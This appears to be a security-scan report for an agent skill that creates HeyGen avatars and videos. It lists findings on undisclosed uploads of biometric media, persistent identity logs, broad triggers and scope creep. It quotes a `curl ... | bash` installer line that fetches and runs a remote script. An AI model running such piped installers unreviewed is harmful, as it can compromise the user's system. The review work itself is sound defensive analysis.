ClawHub

Hg Skills Republish 221

Security checks across malware telemetry and agentic risk

Overview

The skill appears purpose-built for HeyGen avatar and video creation, but it should be reviewed because it handles identity media, credentials, paid account actions, persistent local profile/log files, and remote uploads with incomplete privacy and control guidance.

Review before installing. Use it only with a HeyGen account you intend to grant video/avatar access to, avoid third-party faces or voices without permission, do not provide confidential documents unless you are comfortable sending them to HeyGen, prefer MCP/OAuth or a scoped API key, inspect the CLI installer before running it, and periodically delete AVATAR files and heygen-video-log.jsonl if you do not want that identity and generation history retained locally.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (25)

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
The file embeds detailed eval-runner instructions for reporting results into a specific Notion database, which is outside the stated HeyGen avatar/video functionality. In an agent skill, this expands operational scope and can cause the agent to write data to an unrelated external system, increasing the risk of unintended data exfiltration or unauthorized actions during evaluation or misuse.

Context-Inappropriate Capability

Medium
Confidence
88% confidence
Finding
The install guide instructs the agent to read workspace-wide identity files like SOUL.md and IDENTITY.md and to write a persistent AVATAR-<NAME>.md artifact. That expands the skill's access beyond HeyGen setup into unrelated local context and creates durable identity state, which can expose sensitive workspace information or cause the agent to act on non-essential files during installation.

Context-Inappropriate Capability

Medium
Confidence
90% confidence
Finding
The skill expands from HeyGen video generation into delivery via an external message tool, including downloading the MP4 locally and transmitting it elsewhere. That broadens data flow beyond the declared purpose and tool scope, increasing the chance of unintended exfiltration of generated media or delivery to the wrong destination.

Description-Behavior Mismatch

Medium
Confidence
88% confidence
Finding
The top-level behavior description understates what the skill actually does: it not only returns share/session URLs, but also downloads videos locally, sends them through another tool, and writes logs. This kind of capability mismatch is dangerous because reviewers and users may grant trust or permissions based on incomplete documentation, while the skill performs additional data-handling actions.

Intent-Code Divergence

High
Confidence
95% confidence
Finding
The Frame Check section claims it does not generate images or create new looks, yet its framing notes instruct use of an AI Image tool for generative fill. That contradiction undermines operator expectations and can cause unreviewed synthetic image generation or transformation of user likeness/backgrounds under a supposedly non-generative step.

Intent-Code Divergence

Medium
Confidence
95% confidence
Finding
The document claims the step does not generate images or create new looks, yet the appended prompt explicitly instructs the downstream Video Agent to use an AI Image tool for generative fill. This mismatch can mislead operators and bypass safeguards or user expectations, causing unreviewed image synthesis and background alteration despite the stated restriction.

Missing User Warnings

Low
Confidence
72% confidence
Finding
The documentation instructs use of persistent local credentials and environment-variable API keys without warning about secret handling, storage location, or leakage risks. In agent environments, this can normalize unsafe credential practices, leading to accidental exposure through logs, shared shells, home-directory persistence, or inherited subprocess environments.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The installation instructions tell users to execute a remote script directly via `curl ... | bash`, which removes the opportunity to inspect the downloaded code before execution. In an agent skill context, this is more dangerous because it normalizes unattended code execution from a network source and could lead to full compromise of the user environment if the host, transport, or script source is ever abused.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The first-run prompt encourages an agent to install software and export an API key automatically, without any warning about executing unreviewed code or handling sensitive credentials. In this skill context, that increases risk because the text is designed to be pasted into an agent workflow, potentially causing an agent to fetch code and manipulate secrets with minimal user review.

Natural-Language Policy Violations

Medium
Confidence
83% confidence
Finding
The guide biases the workflow toward creating an avatar for the agent by default rather than requiring explicit user intent. In a skill that can generate identity-bearing media, defaulting to identity creation can lead to unexpected profile creation, misuse of user credits, and generation of persistent persona artifacts the user did not clearly request.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The README instructs users to create a persistent digital twin from a photo and voice and store reusable avatar state, but it does not prominently require informed consent, ownership verification, or disclosure of retention/privacy implications. In a skill specifically designed for identity-first video generation, this omission increases the risk of unauthorized cloning, impersonation, and privacy harm.

Missing User Warnings

Medium
Confidence
89% confidence
Finding
The README advertises turning article URLs and PDFs into videos, but it does not clearly warn that the supplied content may be fetched, processed, and transmitted to external services such as HeyGen or related tooling. This can lead users to expose confidential documents, internal URLs, or sensitive content without realizing it leaves the local environment.

Missing User Warnings

Low
Confidence
77% confidence
Finding
The skill performs remote uploads to HeyGen and local logging while relying on `HEYGEN_API_KEY`, but it does not clearly warn users that provided media, identity files, and generated metadata may be transmitted to a third party and persisted locally. In a skill that handles personal photos, digital twins, and voice/avatar creation, insufficient disclosure increases the risk of accidental exposure of sensitive personal or biometric data.

Vague Triggers

Medium
Confidence
88% confidence
Finding
The trigger examples are broad and the workflow explicitly defaults ambiguous avatar-related requests to invocation, which can cause the skill to activate and act on loosely related prompts without clear user intent. In this skill, that matters because activation can lead to reading identity files, persisting profile data, and potentially creating external account resources, making unintended invocation materially risky.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The skill instructs writing persistent `AVATAR-<NAME>.md` files containing appearance, voice, and service identifiers without any user-facing disclosure that this identity data will be stored in the workspace. This creates a privacy and data-retention risk because sensitive personal descriptors may be saved locally by default, potentially exposing them to other tools, collaborators, or future sessions.

Missing User Warnings

High
Confidence
98% confidence
Finding
The skill encourages photo upload and accepts public image URLs for real-person avatar creation without warning the user that biometric-like facial data will be transmitted to a third-party service and may be retained or reused under that service's policies. Because this involves highly sensitive identity data and external transfer, the missing notice and consent flow materially increases privacy and compliance risk.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The skill instructs persistent logging of detailed generation metadata, including topic, video/session IDs, avatar/voice/style identifiers, orientation, and concerns, without any notice or consent mechanism in the file. This creates a privacy and data-retention risk, especially if topics contain sensitive business, personal, or campaign content and logs are stored insecurely or longer than necessary.

Missing User Warnings

Low
Confidence
81% confidence
Finding
The skill instructs the agent to record asset-classification metadata in a learning log without any guidance to disclose this logging to the user or minimize what is stored. Even if the example fields seem limited, asset metadata can reveal sensitive details about user files, internal resources, or workflow context, creating a quiet privacy and data-governance risk.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The skill instructs the agent to display `preview_image_url` inline, which can cause the client to fetch third-party media directly without informing the user. That may expose IP address, user-agent, timing metadata, and the existence of private avatar assets to an external service, which is especially relevant in a workflow centered on private avatars.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The guidance says to always share playable voice previews and, if missing, generate a TTS sample, but it does not warn that this fetches remote audio or sends sample text to HeyGen for processing. In practice, users may unknowingly disclose text content and trigger outbound network access when evaluating voices.

Missing User Warnings

High
Confidence
98% confidence
Finding
This section describes uploading user photos and videos to create avatars and digital twins without any privacy or sensitivity warning. Because the content involves biometric-like personal media and identity recreation, users could unintentionally send highly sensitive images/videos to a third-party service, creating substantial privacy, consent, and misuse risks.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The direct-image flow tells the agent to pass `image_url` or `image_asset_id` to create a video but omits that the image will be transmitted to an external provider for processing. That can lead to unintended disclosure of personal photos or internal asset references, particularly because this path is framed as the 'simplest' and 'fastest' option.

Vague Triggers

Medium
Confidence
73% confidence
Finding
Broad activation guidance can cause the skill to trigger for loosely related requests, expanding the skill's operational scope beyond what the user intended. In an agent setting, over-broad routing can mis-handle requests, inject irrelevant directives, or cause calls into HeyGen-oriented workflows when a simpler or different tool should have been used.

Ssd 3

Medium
Confidence
96% confidence
Finding
Persisting detailed per-run metadata in a local JSONL file creates a durable record of user requests and generated assets that could be exposed through host compromise, backups, shared workspaces, or later misuse. Because the log includes user-provided topic text and identifiers tied to media generation, the skill context makes this more dangerous than ephemeral runtime state.

External Script Fetching

High
Category
Supply Chain
Content
2. **CLI mode (API-key override)** — If `HEYGEN_API_KEY` is set in the environment AND `heygen --version` exits 0, use CLI. API-key presence is an explicit user signal that they want direct API access; it short-circuits MCP detection. No question asked.
3. **MCP mode** — No `HEYGEN_API_KEY` set AND HeyGen MCP tools are visible in the toolset (tools matching `mcp__heygen__*`). OAuth auth, uses existing plan credits.
4. **CLI mode (fallback)** — MCP tools NOT available AND `heygen --version` exits 0. Auth via `heygen auth login` (persists to `~/.heygen/credentials`).
5. **Neither** — tell the user once: "To use this skill, connect the HeyGen MCP server or install the HeyGen CLI: `curl -fsSL https://static.heygen.ai/cli/install.sh | bash` then `heygen auth login`."

**Hard rules:**
- **Never call `curl api.heygen.com/...`** — every mode routes through its own surface.
Confidence
93% confidence
Finding
curl -fsSL https://static.heygen.ai/cli/install.sh | bash

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal